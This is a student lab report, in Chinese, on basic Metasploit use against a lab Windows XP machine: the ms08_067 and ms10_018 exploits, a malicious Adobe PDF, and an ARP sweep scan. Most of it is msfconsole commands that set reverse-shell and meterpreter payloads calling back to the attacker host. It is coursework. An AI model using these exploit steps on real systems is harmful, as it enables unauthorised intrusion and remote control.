2019-2020-2-20175332 张苗-《网络攻防技术》exp6 MSF基础应用
Posted 20175332zm
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了2019-2020-2-20175332 张苗-《网络攻防技术》exp6 MSF基础应用相关的知识,希望对你有一定的参考价值。
目录
1.实践内容
1.1一个主动攻击实践,如ms08_067;
kali IP:192.168.147.130
XP IP:192.168.147.129
系统版本:
set payload generic/shell_reverse_tcp //选择攻击载荷
show options //查看配置信息
set RHOST 192.168.147.129 //设置靶机IP,端口默认为445
set LPORT 5332
set LHOST 192.168.147.130 //设置攻方IP
set target 6 //通过show targets查看可攻击平台
exploit
问题:
解决办法:查看发现没有关闭防火墙,关闭防火墙重连
1.2 一个针对浏览器的攻击,如ms10_018;
参考博客:https://blog.csdn.net/qq_36197704/article/details/82787731
kali IP:192.168.147.130
XP IP:192.168.147.129
search ms 10_018
use exploit/windows/browser/ms10_018_ie_behaviors //进入该模块
show payloads //显示可用载荷
set payload windows/meterpreter/reverse_tcp
set SRVHOST 192.168.147.130 //设置攻击机IP
set RHOST 192.168.147.129
set LHOST 192.168.147.130
set URIPATH hacker
show targets
exploit //发起渗透攻击
1.3一个针对客户端的攻击,如Adobe;
kali IP:192.168.147.130
XP IP:192.168.147.129
msfconsole
use windows/fileformat/adobe_cooltype_sing //选择攻击模块
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.147.130 //攻击机 IP
set LPORT 5332
set FILENAME 20175332.pdf //设置生成的pdf文件名
exploit //发起攻击
将生成pdf文件传给xp
use exploit/multi/handler //进入监听模块
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.147.130 //攻击机 IP
set LPORT 5332
exploit
1.4 成功应用任何一个辅助模块。
use auxiliary/scanner/discovery/arp_sweep
set RHOST 192.168.147.129/24
set THREAD 50
show options
run
2.实践问题回答
(1)用自己的话解释什么是exploit,payload,encode.
exploit
利用漏洞进行攻击
payload
荷载:一段shellcode代码
encode
去除坏字符
(2)离实战还缺些什么技术或步骤?
缺少自己发现漏洞的能力,现在所掌握的技术都是建立在已知漏洞的基础上,都是使用已他人发现的漏洞进行实践,并且很多实验过程中都需要对靶机做出一定的处理,比如关闭防火墙之类的,并没有真正实现一些东西。
3.实践总结与体会
此次实验,我充分感受到了msf的功能的强大,在以后计算机的使用中一定要经常更新系统补丁。
以上是关于2019-2020-2-20175332 张苗-《网络攻防技术》exp6 MSF基础应用的主要内容,如果未能解决你的问题,请参考以下文章